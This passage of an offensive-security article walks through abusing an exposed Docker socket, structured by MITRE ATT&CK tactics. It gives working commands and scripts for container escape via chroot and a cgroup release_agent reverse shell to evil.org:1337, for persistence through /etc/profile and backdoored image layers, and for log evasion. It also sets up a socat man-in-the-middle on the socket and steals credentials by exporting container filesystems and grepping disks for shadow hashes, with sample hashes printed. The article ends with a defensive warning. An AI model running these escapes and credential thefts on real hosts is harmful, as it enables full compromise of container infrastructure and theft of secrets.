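For reference, here is the same create body built in Python. Note one difference, which is a choice made for this sketch: the transcript above passes Binds at the top level of the JSON, which evidently worked with the 20.10 daemon used here, whereas the Docker API reference documents Binds under HostConfig, and that is where the sketch puts it. The function name and parameters are illustrative.

```python
import json


def chroot_container_spec(image: str = "alpine", host_dir: str = "/",
                          mount_point: str = "/host", shell: str = "/bin/bash"):
    """Body for POST /containers/create with the bind mount under HostConfig."""
    return {
        "Image": image,
        "Cmd": ["chroot", mount_point, shell],  # make the host root our root
        "Tty": True,
        "OpenStdin": True,
        "AttachStdin": True,
        "AttachStdout": True,
        "AttachStderr": True,
        "HostConfig": {"Binds": [f"{host_dir}:{mount_point}"]},
    }


print(json.dumps(chroot_container_spec(), indent=2))
```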

Our container, whose ID starts with 299, is now created and ready to be started. We are going to start it and then attach to it using socat. Remember that the container command is chroot /host, so the container process will be able to use the host binaries:

# start the container
root@739f2eaf254f:/# curl -i --unix-socket /var/run/docker.sock "http://localhost/containers/2997eb/start" -X POST
HTTP/1.1 204 No Content
Api-Version: 1.41
...

root@739f2eaf254f:/# socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/2997eb099cef/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp

HTTP/1.1 101 UPGRADED
Content-Type: application/vnd.docker.raw-stream
Connection: Upgrade
Upgrade: tcp

# the http connection has been hijacked to transport stdin/stdout/stderr data flow
root@2997eb099cef:/# ls
ls
bin   cdrom  etc   lib    lib64   lost+found  mnt  proc  run   snap  sys  usr
boot  dev    home  lib32  libx32  media       opt  root  sbin  srv   tmp  var
root@2997eb099cef:/# ps
ps
    PID TTY          TIME CMD
  55172 pts/0    00:00:00 bash
  56068 pts/0    00:00:00 ps
root@2997eb099cef:/# ps aux | head -n 7
ps aux | head -n 7
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0 169476 13668 ?        Ss   10:28   0:10 /lib/systemd/systemd --system --deserialize 21
root           2  0.0  0.0      0     0 ?        S    10:28   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   10:28   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   10:28   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<   10:28   0:00 [kworker/0:0H-kblockd]
root           9  0.0  0.0      0     0 ?        I<   10:28   0:00 [mm_percpu_wq]

But what happened? Why are we able to see all the host processes from within the container environment? We attached to the container we previously created and started, but this is a “special” container: we set its root directory to the root directory of the host. Hence, we can also access the host proc file system, which lets us see all the processes running on the host, even from inside a container. However, our container is still confined to its own PID namespace, so we cannot interact with processes that are not members of that namespace:

root@2997eb099cef:/# kill 2
kill 2
bash: kill: (2) - No such process

Next we will execute, still from our container, a command on the host environment (i.e. outside of the container one) using crontab:

root@2997eb099cef:/etc# echo "* * * * * root ping -c 20 google.com" >> crontab
root@2997eb099cef:/etc# /etc/init.d/cron reload
 * Reloading configuration files for periodic command scheduler cron  [ OK ]

host@host:~$ ps aux | grep ping | grep -v grep
root       13650  0.0  0.0   2616   596 ?        Ss   16:57   0:00 /bin/sh -c ping -c 20 google.com
root       13651  0.0  0.0  18472  2708 ?        S    16:57   0:00 ping -c 20 google.com

Et voilà! We executed a command on the host :). This command is not subject to the limitations that namespaces impose on the container, hence we achieved privilege escalation. Once we have access to the root file system, imagination is the only limit.

Escaping to host using the cgroups

In this section we will use a well known scenario of privilege escalation, combined with our initial constraint (the exposed Docker socket). First, we prepare our script to inject on the host with the exposed Docker socket:

attacker@evil:~ $ cat wazaa.sh
#!/bin/sh
rmIP="evil.org";
rmPort="1337";
mkdir -p /tmp/cgroup && mount -t cgroup -o memory cgroup /tmp/cgroup && mkdir -p /tmp/cgroup/child;
echo 1 > /tmp/cgroup/child/notify_on_release # run the release agent once the last process leaves the child cgroup
command_exec_path=$(cat /etc/mtab | grep -oP "upperdir=\K/var/lib/docker/overlay2/\w+/diff")
echo "$command_exec_path/reverse_shell.sh" > /tmp/cgroup/release_agent;
echo "#!/bin/bash" > reverse_shell.sh;
echo "bash -i &> /dev/tcp/$rmIP/$rmPort 0>&1" >> reverse_shell.sh;
chmod 777 reverse_shell.sh;
sh -c "echo \$\$ > /tmp/cgroup/child/cgroup.procs"; # put a short-lived process in the child cgroup; when it exits, the handler is triggered

This script does the following:

  1. mount the cgroup virtual filesystem (memory controller) inside the container, under /tmp/cgroup;
  2. create a child cgroup, i.e. a directory named child, under that mount;
  3. set a callback (the release agent) so that when the child cgroup is released (no process is bound inside), an event is triggered which opens a reverse shell.

Last but not least, we prepare our connect-back with a netcat listening on port 1337:

attacker@evil:~ $ nc -l 1337

We need a container that can reach the host and play our script. For that, we construct our evil image from an alpine image and copy our script into it; the script will be set as the command to execute when the container is created:

attacker@evil:~ $ cat Dockerfile
FROM alpine
RUN apk update && apk add curl && apk add grep;
COPY ./wazaa.sh  /wazaa.sh

We build the image (skipped - see previous sections) and download it on the host:

root@739f2eaf254f:/# curl --unix-socket /var/run/docker.sock -X POST   "http://localhost/images/create?fromSrc=http://192.168.1.28:8080/creadacc.tar&repo=creds%3Alatest"
...
{"status":"sha256:5d49c05b199bbb49621db17077217f52d41c38607826c8d6faa071f4ba99f15c"}

Now it’s time for the show. We are going to create a container using the creds image. In addition, we will define this container as privileged (option "Privileged":true below). A privileged container has almost no isolation from the host: capabilities are not dropped, and processes “inside” the container are not restricted by seccomp or AppArmor.

root@739f2eaf254f:/# curl -i --unix-socket /var/run/docker.sock -X POST  \
    -H "Content-Type: application/json" \
    -d '{"AttachStdin":true,"AttachStdout":true,"AttachStderr":true, "Privileged":true, "Tty":true,"OpenStdin":true,"StdinOnce":true,"DetachKeys":"Ctrl-p,Ctrl-q","Cmd":["/bin/sh", "-c", "/wazaa.sh"], "Image":"creds"}' \
    http://localhost/containers/create

HTTP/1.1 201 Created
Api-Version: 1.41
...
{"Id":"889a3b8a91403a702ab513e44268228571d7365d127a0d69e4324dd275f30107","Warnings":[]}

Next, we start that privileged container, which will connect to our evil machine:

# Our new container is started, connecting back to evil.org
root@739f2eaf254f:/# curl -i --unix-socket /var/run/docker.sock -X POST http://localhost/containers/889/start

# shell 1
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@host:/# whoami
whoami
root
root@host:/# cat /etc/shadow | tail -n 2
cat /etc/shadow | tail -n 2
gdm:*:18737:0:99999:7:::
crypto:$6$JtE1EShg6gk.xLbA$a1RWywxkrbSGKbyZ6dNV6GHHnBO38Mz.T.5tLONZgW2FDKHyT.gDj7yJogRyIskpUpTQxNW/m2HKLu
...

Yes, we are root on the host and we can inspect all the credentials currently available!
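
The create-then-start sequence used above can be chained in a script by pulling the Id out of the create response. The following is only a sketch: the function names extract_id and create_and_start are ours, the Id is matched with a crude text pattern rather than a JSON parser, and curl is assumed to be available in the container.

```shell
#!/bin/sh
# Extract the value of the "Id" field from a /containers/create response on stdin.
extract_id() {
    sed -n 's/.*"Id":"\([0-9a-f]*\)".*/\1/p' | head -n 1
}

# Create a container from the JSON payload given as $1, then start it.
# Needs curl and access to the Docker socket; it is only defined here, not called.
create_and_start() {
    sock=/var/run/docker.sock
    id=$(curl -s --unix-socket "$sock" -X POST \
        -H "Content-Type: application/json" \
        -d "$1" http://localhost/containers/create | extract_id)
    # An error response carries no Id: stop instead of starting nothing.
    [ -n "$id" ] || return 1
    curl -s --unix-socket "$sock" -X POST "http://localhost/containers/$id/start"
}
```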

Persistence

The adversary is trying to maintain their foothold.

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

There are different techniques to achieve that.

Valid Accounts

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

To obtain persistence, we will use the Docker socket from a container on the target to download and run another of our evil containers. In that evil container, we plant a script whose content will be appended to /etc/profile on the host (dropping it into /etc/profile.d would work too). This file is executed each time an interactive login shell (e.g. over ssh) is started. We also assume that the default interactive login shell is bash.

attacker@evil:~$ cat 02-backup_gnome.sh
# start a new container only if none whose name contains "pwned" is running
if [ -z "$(docker ps -q --filter name=pwned 2>/dev/null)" ]; then
    # random entry of /tmp, reduced to its first 7 alphanumeric characters
    name=$(ls /tmp | sort -R | tail -n 1 | grep -Eo '[[:alnum:]]{7}' | head -n 1)
    docker run -it -d -v /:/host --name "pwned$name" alpine chroot /host /bin/bash >/dev/null 2>&1
fi

The script checks whether a container whose name starts with pwned is currently running on the host. If not, it picks a random file name from the /tmp directory, keeps its first seven alphanumeric characters, appends them to the prefix (pwned), and launches a container with this name. The container keeps a shell process open whose root directory is changed to the host's root, which is possible thanks to the bind mount. Yes, it can be improved, but that’s not the point.
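
The name-generation step is easy to try on its own. This small sketch isolates the filter applied to the randomly chosen file name; name_suffix is a name we made up for the illustration.

```shell
#!/bin/sh
# Print the first run of 7 alphanumeric characters found in the text read from stdin.
# Prints nothing when the input contains no such run.
name_suffix() {
    grep -Eo '[[:alnum:]]{7}' | head -n 1
}

# Example (not run here):
#   ls /tmp | sort -R | tail -n 1 | name_suffix
```

A file such as systemd-private-... in /tmp yields the suffix systemd, hence a container called pwnedsystemd. If the chosen file name has no run of seven alphanumeric characters, the suffix is empty and the container is simply named pwned.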

Next, we create a Docker image containing this script by using the classic alpine Linux image. Then, we will make it available for download as before.

# building a small image containing the script
attacker@evil:~ $ cat Dockerfile
FROM alpine
COPY ./02-backup_gnome.sh /
attacker@evil:~ $ chmod a+x 02-backup_gnome.sh
attacker@evil:~ $ docker build -t evil .
# run a container in order to obtain the image FS in the form of
# tarball archive
attacker@evil:~ $ docker run -it -d --rm evil /bin/sh
dadb2f393c4108d77ca06cb2e8ffde6b9a740213205d877341c2294a32478053
attacker@evil:~ $ docker export -o evil.tar dadb
# serve it again from our evil web server
attacker@evil:~ $ { printf 'HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n' "$(wc -c < evil.tar)"; cat evil.tar; } | nc -l 8080
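
The one-shot "web server" above is nothing more than a hand-written HTTP response piped into netcat. As a sketch, here is the same idea split into two small functions (http_header and serve_once are our own names). It assumes a netcat flavour that accepts nc -l PORT, as used in this article.

```shell
#!/bin/sh
# Print a minimal HTTP/1.0 response header for a body of $1 bytes.
# Each header line ends with CRLF and an empty line separates header and body.
http_header() {
    printf 'HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n' "$1"
}

# Serve the file $1 exactly once on TCP port $2; only defined here, not called.
serve_once() {
    { http_header "$(wc -c < "$1")"; cat "$1"; } | nc -l "$2"
}

# Example (not run here):
#   serve_once evil.tar 8080
```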

We trigger the deployment of that image from within our Ubuntu container on the host, as seen previously. But this time, we spice things up: we assume there is no alpine image on the host. Note that if there is one, we can just delete it through the Docker socket API, so that’s not really a problem (it might create some issues with existing containers, but we did not investigate that, sorry).

root@e7d4a65766e2:/# curl -X POST --unix-socket /var/run/docker.sock "http://localhost/v1.41/images/create?fromSrc=http://192.168.56.1:8888/evil.tar&repo=alpine%3Alatest"
{"status":"Downloading from http://192.168.56.1:8888/evil.tar"}
...
{"status":"sha256:1c11da6f8fdc5541f7ca0b4c31dfd0235c67061824f5e9170b8a2549a945ef85"}
...

The image is downloaded. We now create a container and start it with the following:

  1. a bind mount of the host filesystem at /host;
  2. the execution of a simple command that appends our super mega evil script from the container to the mounted host filesystem (note: we use >> to append our instructions at the end of the file in case it already exists).

root@e7d4a65766e2:/# curl -i --unix-socket /var/run/docker.sock -X POST \
    -H "Content-Type: application/json" \
    -d '{"AttachStdin":true, "AttachStdout":true, "AttachStderr":true, "Tty":true, "OpenStdin":true, "StdinOnce":true, "DetachKeys":"Ctrl-p,Ctrl-q", "Cmd":["/bin/sh", "-c", "cat 02-backup_gnome.sh >> /host/etc/profile"], "Image":"alpine", "Binds":["/:/host"]}' \
    http://localhost/containers/create

HTTP/1.1 201 Created
....
{"Id":"2a533e721d5c97ff6c74b119fc38dfb0fdb1d92e1e0d88cfc517f11428a95f9a","Warnings":[]}
root@e7d4a65766e2:/# curl -i --unix-socket /var/run/docker.sock -X POST http://localhost/containers/2a/start
HTTP/1.1 204 No Content
...

We do some cleaning by deleting our evil container:

root@e7d4a65766e2:/# curl -i --unix-socket /var/run/docker.sock -XDELETE http://localhost/containers/2a
HTTP/1.1 204 No Content
...

Later, when another user decides to open an interactive login shell on the host:

user@somehost:/ $ ssh crypto@host
crypto@host:~$ docker ps
CONTAINER ID   IMAGE        COMMAND                  CREATED         STATUS        PORTS     NAMES
8fb5ca0edaf0   alpine:2.6   "chroot /host /bin/b…"   3 seconds ago   Up 1 second             pwnedsystemd

And there is another container that just popped up with our ‘signature’ pwned.

Implant Internal Image

Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment.

Another interesting point with this scenario: every image built from the alpine:2.6 tag will in fact be built from the attacker-crafted image carrying the same tag. So every container instantiated from the alpine image will contain the script planted by the attacker.

But if an administrator does some cleaning and decides to remove our image, we lose our persistence. However, let’s look deeper into how images are built. Docker builds images from layers, here OverlayFS layers handled by the overlay2 driver. These layers are stored under the /var/lib/docker/overlay2 directory, or /var/lib/docker/<remapping>/overlay2 if the user namespace remapping feature of Docker is enabled. Have a look at the OverlayFS storage driver documentation:

OverlayFS layers two directories on a single Linux host and presents them as a single directory. These directories are called layers and the unification process is referred to as a union mount. OverlayFS refers to the lower directory as lowerdir and the upper directory as upperdir. The unified view is exposed through its own directory called merged.

We will use this to obtain persistence by infecting the lowerdir of a container, in case our initial image is deleted. This means that all images constructed using this layer as part of the union mount operation will end up having this “infection”.

Here is a dummy example where we have backdoored the ping command (yes, not the most useful, but that is just an example). We first retrieve the LowerDir of a container we will export, and copy our backdoored ping to it (41c is the id of another Ubuntu container currently running on the host).

# get info about the layers of the Ubuntu container
root@739f2eaf254f:/# curl --unix-socket /var/run/docker.sock -X GET http://localhost/containers/41c/json | grep LowerDir
lowerdir":"/var/lib/docker/overlay2/74c851b2fe2df84da7a5dadf8bf487fda997948569e954e5e2f953b5fac4e52b-init/diff:/var/lib/docker/overlay2/e0b2fa36b62e947ffb36ded23b540aacf5e82afb2d3564841518555fb3584e4c/diff

We use what we have previously shown to copy the backdoored ping to /var/lib/docker/overlay2/e0b2fa36b62e947ffb36ded23b540aacf5e82afb2d3564841518555fb3584e4c/diff (yes, beloved reader, that is an exercise for you to do ;-) )
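
The LowerDir value is a colon-separated stack of directories. OverlayFS stacks them from right to left, so the rightmost entry is the lowest layer. A tiny sketch to split the value and pick that entry (list_layers and base_layer are names chosen for this illustration):

```shell
#!/bin/sh
# Split a colon-separated LowerDir value (read from stdin) into one layer per line.
list_layers() {
    tr ':' '\n'
}

# Print the last entry of the stack, i.e. the lowest layer.
base_layer() {
    list_layers | tail -n 1
}
```

Fed with the value shown above, base_layer prints the e0b2fa36... directory, which is the one we are about to tamper with.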

This has 2 consequences:

  1. all running containers using that base image are compromised;
  2. all future containers using that base image (and respectively this layer upon building) are compromised.

For instance, let’s start a new Ubuntu container and run ping:

host@host:~ $ docker run -it --rm ubuntu /bin/bash
root@517da441f410:/# ping
You've been pwned by the master of evil containers ;)

Defense evasion

The adversary is trying to avoid being detected.

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactical techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

Let's see different tricks here too.

Indicator Removal on Host

Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

All the evil containers we are downloading and executing on the host are visible through a docker ps -a on the host itself. This is annoying especially since we don’t want all our super evil tools to be retrieved by the good guys.

To limit that, we can use the AutoRemove flag when we create our container, which will erase it after it exits (exactly the same as --rm on command line):

root@739f2eaf254f:~# curl --unix-socket /var/run/docker.sock -X POST \
    -H "Content-Type: application/json" \
    -d '{"AutoRemove":true, "AttachStdin":true, "AttachStdout":true, "AttachStderr":true, "Tty":true, "OpenStdin":true, "StdinOnce":true, "DetachKeys":"Ctrl-p,Ctrl-q", "Cmd":["/bin/echo", "magic"], "Image":"alpine" }' \
    http://localhost/containers/create

{"Id":"41b8ff0f7857f982ead4dcf3eb9cfdf06b0705804f43ee5ba86fe018157719c8","Warnings":[]}

Now, we can see the container from the host:

host@host:~ $ docker ps -a|grep 41b8
41b8ff0f7857   alpine       "/bin/echo magic"       30 seconds ago      Created                 distracted_hopper

The status is Created which is normal since we didn’t do anything so far. Now, let’s start the container:

root@739f2eaf254f:~# curl -i --unix-socket /var/run/docker.sock "http://localhost/containers/41b8/start" -X POST

HTTP/1.1 204 No Content
Api-Version: 1.41
...

Let’s see what we can spot from the host:

host@host:~ $ docker ps -a| grep 41b8
host@host:~ $ docker logs 41b8
Error: No such container: 41b8

Of course, the Ubuntu (739f2eaf254f) container still holds evidence that we abused the Docker socket, but at least the investigators cannot retrieve the evil tools:

host@host:~ $ docker logs -n 8  73
  > root@739f2eaf254f:~# curl -i --unix-socket /var/run/docker.sock "http://localhost/containers/41b8/start" -X POST
  > HTTP/1.1 204 No Content
  > Api-Version: 1.41
  > ...

As an analyst, just looking at that, we know that container 41b8 was started, and that’s all.
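
To avoid retyping the JSON each time, the payload can be generated by a small helper. This is a sketch under a few assumptions: autoremove_payload is our own name, no JSON escaping is performed, and AutoRemove is placed under HostConfig, which is where the Engine API reference documents it (the request above passes it at the top level, which the daemon used here accepted).

```shell
#!/bin/sh
# Build a create payload for image $1 running the shell command $2,
# with the container removed automatically when it exits.
# Assumption: neither argument contains double quotes or backslashes.
autoremove_payload() {
    printf '{"Image":"%s","Cmd":["/bin/sh","-c","%s"],"HostConfig":{"AutoRemove":true}}\n' "$1" "$2"
}

# Example (not run here):
#   curl --unix-socket /var/run/docker.sock -X POST \
#       -H "Content-Type: application/json" \
#       -d "$(autoremove_payload alpine 'echo magic')" \
#       http://localhost/containers/create
```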

There is also an interesting forcerm parameter on the build API endpoint, if you start playing with image builds on the host.

If you have worked on analyzing an intrusion, you might have seen a final kill $$ in some scripts. This kills the shell abruptly, preventing it from writing its history file. This is a bit like what we achieved here (31337 p0w3R ;)

Impair Defenses

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.

Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.

One more quick and dirty idea, to observe and possibly alter what is passed on to Docker with a man-in-the-middle: let’s put a proxy in front of the Docker socket to filter the commands (special thanks to our colleague Lo).

We will not use our usual Ubuntu container, and will explain why right after. So, let’s assume we have a container in which socat can be installed to set up our man-in-the-middle:

host>> docker run --rm -it -v "/var/run/:/host" alpine:latest /bin/sh
/ # ls -l /host/docker.sock
srw-rw----    1 root     998              0 Aug 10 07:47 /host/docker.sock
/host # apk add socat
...
OK: 9 MiB in 23 packages
/host # mv /host/docker.sock /host/docker.sock.original
/host # socat -t100 -x -v UNIX-LISTEN:/host/docker.sock,mode=777,reuseaddr,fork UNIX-CONNECT:/host/docker.sock.original

We start the container, install socat, then move the Docker socket aside and replace it with our own socket created by socat. On the host where the Docker daemon is running, we execute docker ps and see the following in our MITM:

> 2021/08/17 07:05:15.402989  length=81 from=0 to=80
 48 45 41 44 20 2f 5f 70 69 6e 67 20 48 54 54 50  HEAD /_ping HTTP
 2f 31 2e 31 0d 0a                                /1.1..
 48 6f 73 74 3a 20 64 6f 63 6b 65 72 0d 0a        Host: docker..
 55 73 65 72 2d 41 67 65 6e 74 3a 20 44 6f 63 6b  User-Agent: Dock
 65 72 2d 43 6c 69 65 6e 74 2f 32 30 2e 31 30 2e  er-Client/20.10.
 36 20 28 6c 69 6e 75 78 29 0d 0a                 6 (linux)..
 0d 0a                                            ..
--
< 2021/08/17 07:05:15.403878  length=280 from=0 to=279
 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d  HTTP/1.1 200 OK.
 0a                                               .
 41 70 69 2d 56 65 72 73 69 6f 6e 3a 20 31 2e 34  Api-Version: 1.4
 31 0d 0a                                         1..
 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e  Cache-Control: n
 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72  o-cache, no-stor
 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61  e, must-revalida
 74 65 0d 0a                                      te..
 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20  Content-Length:
 30 0d 0a                                         0..
 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65  Content-Type: te
 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65  xt/plain; charse
 74 3d 75 74 66 2d 38 0d 0a                       t=utf-8..
 44 6f 63 6b 65 72 2d 45 78 70 65 72 69 6d 65 6e  Docker-Experimen
 74 61 6c 3a 20 66 61 6c 73 65 0d 0a              tal: false..
 4f 73 74 79 70 65 3a 20 6c 69 6e 75 78 0d 0a     Ostype: linux..
 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65  Pragma: no-cache
 0d 0a                                            ..
 53 65 72 76 65 72 3a 20 44 6f 63 6b 65 72 2f 32  Server: Docker/2
 30 2e 31 30 2e 36 20 28 6c 69 6e 75 78 29 0d 0a  0.10.6 (linux)..
 44 61 74 65 3a 20 54 75 65 2c 20 31 37 20 41 75  Date: Tue, 17 Au
 67 20 32 30 32 31 20 30 37 3a 30 35 3a 31 35 20  g 2021 07:05:15
 47 4d 54 0d 0a                                   GMT..
 0d 0a                                            ..
--
> 2021/08/17 07:05:15.405715  length=96 from=81 to=176
 47 45 54 20 2f 76 31 2e 34 31 2f 63 6f 6e 74 61  GET /v1.41/conta
 69 6e 65 72 73 2f 6a 73 6f 6e 20 48 54 54 50 2f  iners/json HTTP/
 31 2e 31 0d 0a                                   1.1..
...
< 2021/08/17 07:05:15.407683  length=2026 from=280 to=2305
 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d  HTTP/1.1 200 OK.
 0a                                               .
...
5b 7b 22 49 64 22 3a 22 36 39 35 34 31 64 65 37  [{"Id":"69541de7
 32 35 39 39 30 66 32 37 39 33 62 62 37 30 63 39  25990f2793bb70c9
 34 64 65 65 33 64 33 65 64 39 65 64 37 61 30 31  4dee3d3ed9ed7a01
 62 61 35 30 38 38 39 30 31 38 62 30 30 34 34 33  ba50889018b00443
 61 64 65 62 64 64 38 36 22 2c 22 4e 61 6d 65 73  adebdd86","Names
...

Instead of a “passive” sniffer, we could use an active one that filters the output of every docker command (e.g. to hide the attacker’s container from docker ps) or the input (e.g. to drop a docker kill sent to one of our containers).

As promised, a final word on why we couldn't use our Ubuntu container. To perform this trick, we needed to move the Docker socket in order to replace it with our own. However, in the Ubuntu container, only the socket itself is bind-mounted: when we tried to move it elsewhere inside the container, the move failed (most likely because the bind-mounted socket is itself a mount point, which cannot be renamed).

root@739f2eaf254f:/var/run# mv docker.sock /
mv: cannot move 'docker.sock' to '/docker.sock': Device or resource busy
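
A bind-mounted file shows up as its own mount point inside the container, and the kernel refuses to rename a mount point (EBUSY), which is one plausible explanation for the error above. Here is a sketch to check whether a path is a mount point by reading the mountinfo table; is_mount_point is our own helper name, and the second argument exists only so the function can be tried against a saved copy of the table.

```shell
#!/bin/sh
# Succeed if path $1 is listed as a mount point (5th field) in a mountinfo file.
# $2 defaults to the mount table of the current process.
is_mount_point() {
    awk -v p="$1" '$5 == p { found = 1 } END { exit !found }' "${2:-/proc/self/mountinfo}"
}

# Example inside the container (not run here). Depending on the image,
# /var/run may be a symlink to /run, so both spellings are worth checking:
#   is_mount_point /run/docker.sock || is_mount_point /var/run/docker.sock
```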

Credential access

The adversary is trying to steal account names and passwords.

Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.

There are many more credentials to steal when an adversary has access to the Docker daemon. We can extend MITRE’s definition to the theft of certificates and private keys, on top of account names and passwords. We can also divide the credentials potentially at risk when the socket is exposed into two groups:

  • credentials from the host OS;
  • credentials from the other containers running on the host.

We will present a detailed scenario for each group.

Credentials from other containers

Stealing credentials from other containers means accessing their filesystem. Thankfully, the Docker API is resourceful and we will use one instruction we have already seen: export.

From the Ubuntu container, we will instruct the Docker socket to export the filesystem of the alpine container:

root@739f2eaf254f:/# curl --unix-socket /var/run/docker.sock http://localhost/containers/4d40/export -X GET -o x.tar
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 6573k    0 6573k    0     0  61.7M      0 --:--:-- --:--:-- --:--:-- 61.7M

Now that we have the filesystem, we can look for any secret it contains. For example:

  • /etc/shadow;
  • certificates;
  • private keys.

Of course, as we don’t like repeating actions, we can script that:

  1. list all containers;
  2. for each container:
    • export its filesystem;
    • do your magic to extract and save the secrets you want;
    • delete the export;
  3. upload the results to attacker@evil.
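
The steps above can be sketched as follows. Take it as a starting point rather than a finished tool: parse_ids and harvest are names we made up, the Ids are extracted with a crude text match instead of a JSON parser, only etc/shadow is kept (we assume that is the member name in the export archive), and the upload step is left out.

```shell
#!/bin/sh
SOCK=/var/run/docker.sock

# Extract every container Id from a /containers/json response read from stdin.
parse_ids() {
    grep -o '"Id":"[0-9a-f]*"' | cut -d'"' -f4
}

# Export each container, keep only etc/shadow, then delete the export.
# $1 is the output directory (any writable path). Only defined here, not called.
harvest() {
    out=$1
    mkdir -p "$out"
    curl -s --unix-socket "$SOCK" "http://localhost/containers/json?all=1" | parse_ids |
    while read -r id; do
        curl -s --unix-socket "$SOCK" "http://localhost/containers/$id/export" -o "$out/$id.tar"
        mkdir -p "$out/$id"
        # Containers without an etc/shadow entry are silently skipped.
        tar -xf "$out/$id.tar" -C "$out/$id" etc/shadow 2>/dev/null
        rm -f "$out/$id.tar"
    done
}
```

Calling harvest /tmp/loot leaves one directory per container that has a shadow file, ready to be shipped to attacker@evil.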

As seen in the Defense evasion section, remember to use AutoRemove (the equivalent of --rm) to erase your footprints.

Credentials from the host

We have already seen some ways to access the host filesystem, but let’s have fun with another one: a privileged container. After all, we have access to the Docker socket, so let’s abuse some privilege there.

Remember we don’t need anything special here, we just need to start a new container with the --privileged option and connect to that container.

root@739f2eaf254f:~# curl --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json"  \
  -d '{"Privileged":true, "AttachStdin":true, "AttachStdout":true, "AttachStderr":true, "Tty":true, "OpenStdin":true, "StdinOnce":true, "DetachKeys":"Ctrl-p,Ctrl-q", "Cmd":["/bin/bash"], "Image":"ubuntu" }' \
   http://localhost/containers/create

{"Id":"3306475e5b870bd10f73dd0bcf48a34777459f0ad3594f26ada4c1ebefdba653","Warnings":[]}


root@739f2eaf254f:~# curl -i --unix-socket /var/run/docker.sock "http://localhost/containers/3306/start" -X POST

HTTP/1.1 204 No Content
Api-Version: 1.41
...

root@739f2eaf254f:~# socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/3306/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp


grep -a '^[a-zA-Z0-9]*:\$.\$' /dev/sda3
grep -a '^[a-zA-Z0-9]*:\$.\$' /dev/sda3
...
bob:$6$uIpLjdAOkiXw1biI$QrTijJtxf2JmyYO3TcdLaR.eDcGNO5ZVfDl25y2da5i/CVws/FNDnxy4cRNs1sLTMZDKY8pVeQnkXLlluhDY.0:18752:0:99999:7:::
john:$6$YHQn/ThUflkAWw/L$CkWP3H2ZqqxKyGv3L0xFawzE97FWMXwCrKUgA8eJiGdiPR0t5c33Vy1PFNh.Bq9bgnBVdjiJ88uXLl1YNcfbi0:18778:0:99999:7:::
...

Since our container is privileged, it can access /dev and the devices for the hard drive.
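
The grep pattern used on the raw device deserves a word: it keeps lines that start with an alphanumeric account name followed by a hash of the form $id$..., where id is a single character (for instance $6$ for SHA-512). Locked accounts such as gdm:*: are ignored. A sketch to try the pattern on any input (find_shadow_hashes is our own wrapper name):

```shell
#!/bin/sh
# Print lines that look like shadow entries carrying a $id$... password hash.
# -a makes grep treat binary input (such as a raw block device) as text.
# With no argument the function reads stdin; otherwise it reads the given files.
find_shadow_hashes() {
    grep -a '^[a-zA-Z0-9]*:\$.\$' "$@"
}

# Example in a privileged container (not run here):
#   find_shadow_hashes /dev/sda3
```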

Discovery

The adversary is trying to figure out your environment.

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.

Remember how we "faked" docker ps with curl to list all containers, or docker images to list all images. We have been doing that since the beginning of the article ;-).

Impact

The adversary is trying to manipulate, interrupt, or destroy your systems and data.

Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes.

We deleted a container in the Persistence section with a simple DELETE command:

curl -i --unix-socket /var/run/docker.sock -XDELETE http://localhost/containers/2a

We could also inject commands into containers to exhaust resources (e.g. opening many files or sockets, launching a fork bomb, …). Not so fun.

Conclusion

In this article, we looked deeper into the warning: don’t expose the Docker socket. We wanted to understand why and how. Luckily, the MITRE ATT&CK® matrix came out just as we were starting to write this article, and we used it to structure our examples.

We also tried to show a few tricks around Docker or “light” Unix commands and tools. The summary is that your imagination is the only limit when you want to do evil things using the Docker socket and more generally when you have access to the host from a container. So, yes, don’t expose it and protect it seriously or your complete infrastructure will be doomed (user remap is really helpful).

Greetings

